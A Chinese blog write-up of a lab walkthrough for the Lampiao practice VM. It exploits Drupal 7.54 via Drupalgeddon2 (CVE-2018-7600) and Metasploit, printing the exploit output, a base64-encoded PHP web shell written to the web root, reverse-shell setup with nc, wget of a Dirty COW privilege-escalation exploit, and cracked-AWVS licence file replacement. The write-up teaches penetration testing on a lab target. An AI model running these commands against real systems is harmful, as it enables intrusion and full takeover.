2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

news/2024/10/17 11:35:19/

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。

文章目录

  • 前言
  • 一、环境重新部署
  • 二、AWVS+xray联动和xray+bs联动
    • 1.安装AWVS+xray
    • 2.让xray和bs先联动
    • 3.AWVS和xray联动
  • 三、poc利用
  • 四、msf的cve利用(姿势3)
  • 总结


前言

前言:

我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell

这次我们用框架来尝试两种不同方法拿到shell

思路清晰,先说步骤

1.信息收集得到可以用的站点漏洞

2.通过AWVS+xray或xray和bs解析出目录报告,得到我们能利用exp或poc,当然因为AWVS爬虫功能并不免费,所以最好联动,也可以和其他工具联动,思想是自动化的思想,得到可以利用的框架漏洞。

3.得到可以用的poc或exp直接利用提权,如果又cve更好。


一、环境重新部署

前面我们从robots.txt拿到的框架搜索一下

在这里插入图片描述drupal 7.54

谷歌老师
在这里插入图片描述
我们把靶机移到和我windows一样的网段,我用kali扫描他
靶机ip
192.168.198.135

在这里插入图片描述
在这里插入图片描述


二、AWVS+xray联动和xray+bs联动

1.安装AWVS+xray

在这里插入图片描述
点这个安装
在这里插入图片描述
无脑下一步就好了

复制wvsc.exe到“C:\Program Files (x86)\Acunetix\13.0.200205121\”下覆盖同名文件
(这里的路径是自己awvs选择的下载安装路径)

在这里插入图片描述
把认证文件替换了
复制license_info.json到“C:\ProgramData\Acunetix\shared\license”下覆盖同名文件
(这个的路径都一样)

在这里插入图片描述直接运行
在这里插入图片描述安装xray

解压、运行acunetix_13.0.200205121.exe安装
在这里插入图片描述在这里插入图片描述

2.让xray和bs先联动

先了解一下xray命令
如果想要进行单个网页简单的扫描

.\xray_windows_amd64.exe webscan --url http://192.168.198.135:1898/ --html-output single-url.html

在这里插入图片描述

因为如果我们想要单个界面逐个测试,同时验证漏洞是否可执行,那么就需要 BS作为中间人,把数据传到 Xray , 我们就可以根据 Xray 给的漏洞提示结合 BS 进行漏洞可行性测试

打开 BS , 设置代理,此操作是为了向 Xray 传输数据

在这里插入图片描述
接着我们向 Xray 设置监听,用来接收BS收到的数据

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html

在这里插入图片描述我们下载bs做中间人攻击代理,把包转发给xray
在这里插入图片描述我们发数据包过去
在这里插入图片描述
xray跑出来了很多信息
在这里插入图片描述

我们目前是网页—》bs—》xray
我们还需要和AWVS和xray联动

3.AWVS和xray联动

如果我想利用社区版 Xray 进行爬虫爆破子域名或者各种文件后缀,不好意思,这些功能得付费才能使用
但是我们又知道 AWVS 的爬虫功能又很厉害,那么我们能不能将二者结合起来呢?

打开 AWVS
默认进入网站是 127.0.0.1:3443 ,前提是你没有修改端口
添加一个target
在这里插入图片描述
点击save
在这里插入图片描述
为 AWVS 设置代理

上一步点击代理后,就会跳到另一个界面

划到底部就会看见 HTTP

点击 Proxy Server 就会展开
在这里插入图片描述
先点save,再点scan
在这里插入图片描述
如果没有特殊要求点击 Create Scan 即可
在这里插入图片描述联动了
在这里插入图片描述

三、poc利用

通过AWVS+xray跑出了

poc:poc-yaml-drupal-cve-2018-7600-rce

那么Xray是给出了两篇poc的文章:
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/

用法:
在这里插入图片描述

wget clone https://github.com/dreadlocked/Drupalgeddon2.git
./drupalgeddon2.rb http://192.168.198.135:1898/

报错了
在这里插入图片描述要安装模块

sudo gem install highline

在这里插入图片描述通过poc发现对方是7.x的drupal版本漏洞,通过base64方法上传shell.php成功获得shell
在这里插入图片描述
上传一句话木马 连马

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.198.135:1898/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.198.135:1898/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo IXTDUTSD
[+] Result : IXTDUTSD
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.198.135:1898/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.198.135:1898/shell.php' -d 'c=hostname'

然后该shell是无法执行g++命令的

我将python进行反弹shell到本地nc交互:

kali开启nc监听

nc -vlp 6666

在这里插入图片描述
靶机有python执行远控,主动连接

这里的python 的socket远控代码大家私信我,我直接发出来不太好。。。。

反弹shell
bash的shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
kali网页开启http
在这里插入图片描述
靶机wget

wget http://192.168.198.133:8000/40847.cpp

在这里插入图片描述
提权
在这里插入图片描述

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

在这里插入图片描述
flag
在这里插入图片描述

四、msf的cve利用(姿势3)

这个姿势我们用框架的cve渗透靶机
在这里插入图片描述查看要配置的参数

在这里插入图片描述run攻击playload
在这里插入图片描述
这里提权步骤有些问题

因为wget在这里用不了,我们可以用其他方式上传文件
在这里插入图片描述
这是一个伪shell
不会回显信息
我们要获取tty

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述尝试提权
在这里插入图片描述

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o muma 40847.cpp -lutil

在这里插入图片描述
提权不了,这里是因为主动连接的问题,还是需要让靶机主动连接我们

远控木马不能发,私信我,谅解一下

nc连接
在这里插入图片描述
提权

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

flag
在这里插入图片描述


总结

上面就是对于框架渗透的wp了,希望大家能学到这个方法论,喜欢的可以点个赞。
特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。


http://www.ppmy.cn/news/59350.html

相关文章

java 异常

Throwable&#xff1a; Throwable 是 Java 编程语言中所有错误和异常类的超类&#xff0c;用于表示可以被抛出的任何对象。它定义了两个子类&#xff1a;Error 和 Exception。 Error 表示严重问题&#xff0c;一般由 JVM 抛出&#xff0c;如 OutOfMemoryError、StackOverflow…

Java程序设计入门教程---循环结构(while)

目录 思考 概念 语法 案例&#xff1a;求1到100的整数和&#xff1f; 案例分析 思考 1. 让你输出10000000000000000句“Hello,world!”&#xff0c;你怎么写代码&#xff1f; 2. 求1到100的整数和&#xff1f; 概念 循环结构程序多次循环执行相同或相近的任务。 while循环…

NIST SP 800-193: BIOS 平台固件弹性指南

NIST SP 800-147&#xff0c;BIOS 保护指南 ( NIST SP 800-147 [1]、NIST SP 800-147B [2]&#xff09;解决了 BIOS 的保护问题 可从此处免费获得&#xff1a; https://doi.org/10.6028/NIST.SP.800-193 摘要 此文档提供了关于支持平台固件和数据对抗潜在地具有破坏性的攻…

第二届“强国青年科学家”获奖者均有海外经历

今天是五四青年节&#xff0c;为了弘扬五四精神&#xff0c;知识人网小编本期专门介绍10名第二届“强国青年科学家”获奖者。特别提示&#xff1a;这些科学家均具有海外留学或研究经历。 五四精神的核心内容为“爱国、进步、民主、科学”。 进一步弘扬科学精神&#xff0c;营造…

Redis的Java客户端

1.快速入门 Jedis使用的基本步骤&#xff1a; 1.引入依赖 2.创建Jedis对象&#xff0c;建立连接 3.使用Jedis&#xff0c;方法名与Redis命令一致 4.释放资源 <!--jedis依赖--> <dependency><groupId>redis.clients</groupId><artifactId>je…

2022全国职业技能大赛私有云搭建及注意事项

私有云 环境准备 基础配置搭建yum源修改openrc.sh计算节点分区脚本安装安装平台基本服务 环境准备 软件包&#xff1a; 答题云主机环境&#xff1b;CentOS-7-x86_64-DVD-2009.iso&#xff08;centos7.9&#xff09; iaas版本&#xff1b;chinaskills_cloud_iaas_v2.0.3.iso&…

如何使用Spring Boot Maven插件

Maven Maven用户可以继承spring-boot-starter-parent项目来获取合适的默认设置。该父项目提供以下特性&#xff1a; 默认编译级别为Java 1.6源码编码为UTF-8一个依赖管理节点&#xff0c;允许你省略普通依赖的<version>标签&#xff0c;继承自spring-boot-dependencies…

Photoshop如何使用滤镜之实例演示?

文章目录 0.引言1.将普通照片制作成油画效果2.使用液化滤镜修出完美身材3.用镜头光晕滤镜制作唯美的逆光人像4.用Camera Raw滤镜对偏色风景照进行调色 0.引言 因科研等多场景需要进行绘图处理&#xff0c;笔者对PS进行了学习&#xff0c;本文通过《Photoshop2021入门教程》及其…